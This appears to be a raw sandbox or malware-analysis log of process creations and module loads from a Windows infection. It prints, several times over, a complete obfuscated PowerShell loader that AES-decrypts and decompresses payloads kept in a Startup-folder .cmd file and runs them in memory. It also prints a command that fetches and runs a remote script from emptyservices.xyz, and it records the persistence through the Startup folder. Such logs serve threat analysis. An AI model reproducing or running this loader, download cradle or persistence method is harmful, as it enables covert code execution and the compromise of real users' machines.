Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd" | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd';$NHES='ErLgzntrLgzryrLgzPorLgzinrLgztrLgz'.Replace('rLgz', ''),'CHprLhHprLanHprLgeEHprLxtHprLensHprLionHprL'.Replace('HprL', ''),'CrvvlOevvlOavvlOtevvlODevvlOcrvvlOyvvlOptvvlOorvvlO'.Replace('vvlO', ''),'RemtKNamtKNdLmtKNinmtKNesmtKN'.Replace('mtKN', ''),'SptlAblittlAb'.Replace('tlAb', ''),'MaiShffnShffMoShffdShffulShffeShff'.Replace('Shff', ''),'GetKIgbCKIgburKIgbrKIgbenKIgbtPrKIgboKIgbceKIgbssKIgb'.Replace('KIgb', ''),'DecCIZVomCIZVprCIZVessCIZV'.Replace('CIZV', ''),'FrotqyzmBtqyzasetqyz6tqyz4Stqyztrtqyzitqyzngtqyz'.Replace('tqyz', ''),'ThZggrhZgganshZggfohZggrhZggmFhZgginahZgglBlhZggochZggkhZgg'.Replace('hZgg', ''),'InUneOvoUneOkeUneO'.Replace('UneO', ''),'ElLHtjemeLHtjntLHtjALHtjtLHtj'.Replace('LHtj', ''),'LoaKqbadKqba'.Replace('Kqba', ''),'CoqGYmpyqGYmToqGYm'.Replace('qGYm', '');powershell -w hidden;function fyfwL($itxzH){$CuCRJ=[System.Security.Cryptography.Aes]::Create();$CuCRJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$CuCRJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$CuCRJ.Key=[System.Convert]::($NHES[8])('gdCIwM8MuMxo7da/mrtCyIbOUmXu2FksViNDT/cHSz8=');$CuCRJ.IV=[System.Convert]::($NHES[8])('gcSSwI2zcUs6f9nNUiiZ/Q==');$kPfFB=$CuCRJ.($NHES[2])();$bvXzm=$kPfFB.($NHES[9])($itxzH,0,$itxzH.Length);$kPfFB.Dispose();$CuCRJ.Dispose();$bvXzm;}function RmDOY($itxzH){$dolaJ=New-Object System.IO.MemoryStream(,$itxzH);$wpdCQ=New-Object System.IO.MemoryStream;$MfuWs=New-Object System.IO.Compression.GZipStream($dolaJ,[IO.Compression.CompressionMode]::($NHES[7]));$MfuWs.($NHES[13])($wpdCQ);$MfuWs.Dispose();$dolaJ.Dispose();$wpdCQ.Dispose();$wpdCQ.ToArray();}$iiIRz=[System.IO.File]::($NHES[3])([Console]::Title);$bZoFj=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 5).Substring(2))));$NLfYF=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 6).Substring(2))));[System.Reflection.Assembly]::($NHES[12])([byte[]]$NLfYF).($NHES[0]).($NHES[10])($null,$null);[System.Reflection.Assembly]::($NHES[12])([byte[]]$bZoFj).($NHES[0]).($NHES[10])($null,$null); " | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout /nobreak /t 1 | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })" | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\c.bat" " | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })" | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\c.bat" | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Local\Temp\c.bat';$NHES='ErLgzntrLgzryrLgzPorLgzinrLgztrLgz'.Replace('rLgz', ''),'CHprLhHprLanHprLgeEHprLxtHprLensHprLionHprL'.Replace('HprL', ''),'CrvvlOevvlOavvlOtevvlODevvlOcrvvlOyvvlOptvvlOorvvlO'.Replace('vvlO', ''),'RemtKNamtKNdLmtKNinmtKNesmtKN'.Replace('mtKN', ''),'SptlAblittlAb'.Replace('tlAb', ''),'MaiShffnShffMoShffdShffulShffeShff'.Replace('Shff', ''),'GetKIgbCKIgburKIgbrKIgbenKIgbtPrKIgboKIgbceKIgbssKIgb'.Replace('KIgb', ''),'DecCIZVomCIZVprCIZVessCIZV'.Replace('CIZV', ''),'FrotqyzmBtqyzasetqyz6tqyz4Stqyztrtqyzitqyzngtqyz'.Replace('tqyz', ''),'ThZggrhZgganshZggfohZggrhZggmFhZgginahZgglBlhZggochZggkhZgg'.Replace('hZgg', ''),'InUneOvoUneOkeUneO'.Replace('UneO', ''),'ElLHtjemeLHtjntLHtjALHtjtLHtj'.Replace('LHtj', ''),'LoaKqbadKqba'.Replace('Kqba', ''),'CoqGYmpyqGYmToqGYm'.Replace('qGYm', '');powershell -w hidden;function fyfwL($itxzH){$CuCRJ=[System.Security.Cryptography.Aes]::Create();$CuCRJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$CuCRJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$CuCRJ.Key=[System.Convert]::($NHES[8])('gdCIwM8MuMxo7da/mrtCyIbOUmXu2FksViNDT/cHSz8=');$CuCRJ.IV=[System.Convert]::($NHES[8])('gcSSwI2zcUs6f9nNUiiZ/Q==');$kPfFB=$CuCRJ.($NHES[2])();$bvXzm=$kPfFB.($NHES[9])($itxzH,0,$itxzH.Length);$kPfFB.Dispose();$CuCRJ.Dispose();$bvXzm;}function RmDOY($itxzH){$dolaJ=New-Object System.IO.MemoryStream(,$itxzH);$wpdCQ=New-Object System.IO.MemoryStream;$MfuWs=New-Object System.IO.Compression.GZipStream($dolaJ,[IO.Compression.CompressionMode]::($NHES[7]));$MfuWs.($NHES[13])($wpdCQ);$MfuWs.Dispose();$dolaJ.Dispose();$wpdCQ.Dispose();$wpdCQ.ToArray();}$iiIRz=[System.IO.File]::($NHES[3])([Console]::Title);$bZoFj=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 5).Substring(2))));$NLfYF=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 6).Substring(2))));[System.Reflection.Assembly]::($NHES[12])([byte[]]$NLfYF).($NHES[0]).($NHES[10])($null,$null);[System.Reflection.Assembly]::($NHES[12])([byte[]]$bZoFj).($NHES[0]).($NHES[10])($null,$null); " | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout /nobreak /t 1 | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd" | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd" | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd';$NHES='ErLgzntrLgzryrLgzPorLgzinrLgztrLgz'.Replace('rLgz', ''),'CHprLhHprLanHprLgeEHprLxtHprLensHprLionHprL'.Replace('HprL', ''),'CrvvlOevvlOavvlOtevvlODevvlOcrvvlOyvvlOptvvlOorvvlO'.Replace('vvlO', ''),'RemtKNamtKNdLmtKNinmtKNesmtKN'.Replace('mtKN', ''),'SptlAblittlAb'.Replace('tlAb', ''),'MaiShffnShffMoShffdShffulShffeShff'.Replace('Shff', ''),'GetKIgbCKIgburKIgbrKIgbenKIgbtPrKIgboKIgbceKIgbssKIgb'.Replace('KIgb', ''),'DecCIZVomCIZVprCIZVessCIZV'.Replace('CIZV', ''),'FrotqyzmBtqyzasetqyz6tqyz4Stqyztrtqyzitqyzngtqyz'.Replace('tqyz', ''),'ThZggrhZgganshZggfohZggrhZggmFhZgginahZgglBlhZggochZggkhZgg'.Replace('hZgg', ''),'InUneOvoUneOkeUneO'.Replace('UneO', ''),'ElLHtjemeLHtjntLHtjALHtjtLHtj'.Replace('LHtj', ''),'LoaKqbadKqba'.Replace('Kqba', ''),'CoqGYmpyqGYmToqGYm'.Replace('qGYm', '');powershell -w hidden;function fyfwL($itxzH){$CuCRJ=[System.Security.Cryptography.Aes]::Create();$CuCRJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$CuCRJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$CuCRJ.Key=[System.Convert]::($NHES[8])('gdCIwM8MuMxo7da/mrtCyIbOUmXu2FksViNDT/cHSz8=');$CuCRJ.IV=[System.Convert]::($NHES[8])('gcSSwI2zcUs6f9nNUiiZ/Q==');$kPfFB=$CuCRJ.($NHES[2])();$bvXzm=$kPfFB.($NHES[9])($itxzH,0,$itxzH.Length);$kPfFB.Dispose();$CuCRJ.Dispose();$bvXzm;}function RmDOY($itxzH){$dolaJ=New-Object System.IO.MemoryStream(,$itxzH);$wpdCQ=New-Object System.IO.MemoryStream;$MfuWs=New-Object System.IO.Compression.GZipStream($dolaJ,[IO.Compression.CompressionMode]::($NHES[7]));$MfuWs.($NHES[13])($wpdCQ);$MfuWs.Dispose();$dolaJ.Dispose();$wpdCQ.Dispose();$wpdCQ.ToArray();}$iiIRz=[System.IO.File]::($NHES[3])([Console]::Title);$bZoFj=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 5).Substring(2))));$NLfYF=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 6).Substring(2))));[System.Reflection.Assembly]::($NHES[12])([byte[]]$NLfYF).($NHES[0]).($NHES[10])($null,$null);[System.Reflection.Assembly]::($NHES[12])([byte[]]$bZoFj).($NHES[0]).($NHES[10])($null,$null); " | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd" | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd';$NHES='ErLgzntrLgzryrLgzPorLgzinrLgztrLgz'.Replace('rLgz', ''),'CHprLhHprLanHprLgeEHprLxtHprLensHprLionHprL'.Replace('HprL', ''),'CrvvlOevvlOavvlOtevvlODevvlOcrvvlOyvvlOptvvlOorvvlO'.Replace('vvlO', ''),'RemtKNamtKNdLmtKNinmtKNesmtKN'.Replace('mtKN', ''),'SptlAblittlAb'.Replace('tlAb', ''),'MaiShffnShffMoShffdShffulShffeShff'.Replace('Shff', ''),'GetKIgbCKIgburKIgbrKIgbenKIgbtPrKIgboKIgbceKIgbssKIgb'.Replace('KIgb', ''),'DecCIZVomCIZVprCIZVessCIZV'.Replace('CIZV', ''),'FrotqyzmBtqyzasetqyz6tqyz4Stqyztrtqyzitqyzngtqyz'.Replace('tqyz', ''),'ThZggrhZgganshZggfohZggrhZggmFhZgginahZgglBlhZggochZggkhZgg'.Replace('hZgg', ''),'InUneOvoUneOkeUneO'.Replace('UneO', ''),'ElLHtjemeLHtjntLHtjALHtjtLHtj'.Replace('LHtj', ''),'LoaKqbadKqba'.Replace('Kqba', ''),'CoqGYmpyqGYmToqGYm'.Replace('qGYm', '');powershell -w hidden;function fyfwL($itxzH){$CuCRJ=[System.Security.Cryptography.Aes]::Create();$CuCRJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$CuCRJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$CuCRJ.Key=[System.Convert]::($NHES[8])('gdCIwM8MuMxo7da/mrtCyIbOUmXu2FksViNDT/cHSz8=');$CuCRJ.IV=[System.Convert]::($NHES[8])('gcSSwI2zcUs6f9nNUiiZ/Q==');$kPfFB=$CuCRJ.($NHES[2])();$bvXzm=$kPfFB.($NHES[9])($itxzH,0,$itxzH.Length);$kPfFB.Dispose();$CuCRJ.Dispose();$bvXzm;}function RmDOY($itxzH){$dolaJ=New-Object System.IO.MemoryStream(,$itxzH);$wpdCQ=New-Object System.IO.MemoryStream;$MfuWs=New-Object System.IO.Compression.GZipStream($dolaJ,[IO.Compression.CompressionMode]::($NHES[7]));$MfuWs.($NHES[13])($wpdCQ);$MfuWs.Dispose();$dolaJ.Dispose();$wpdCQ.Dispose();$wpdCQ.ToArray();}$iiIRz=[System.IO.File]::($NHES[3])([Console]::Title);$bZoFj=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 5).Substring(2))));$NLfYF=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 6).Substring(2))));[System.Reflection.Assembly]::($NHES[12])([byte[]]$NLfYF).($NHES[0]).($NHES[10])($null,$null);[System.Reflection.Assembly]::($NHES[12])([byte[]]$bZoFj).($NHES[0]).($NHES[10])($null,$null); " | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout /nobreak /t 1 | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll | Jump to behavior |
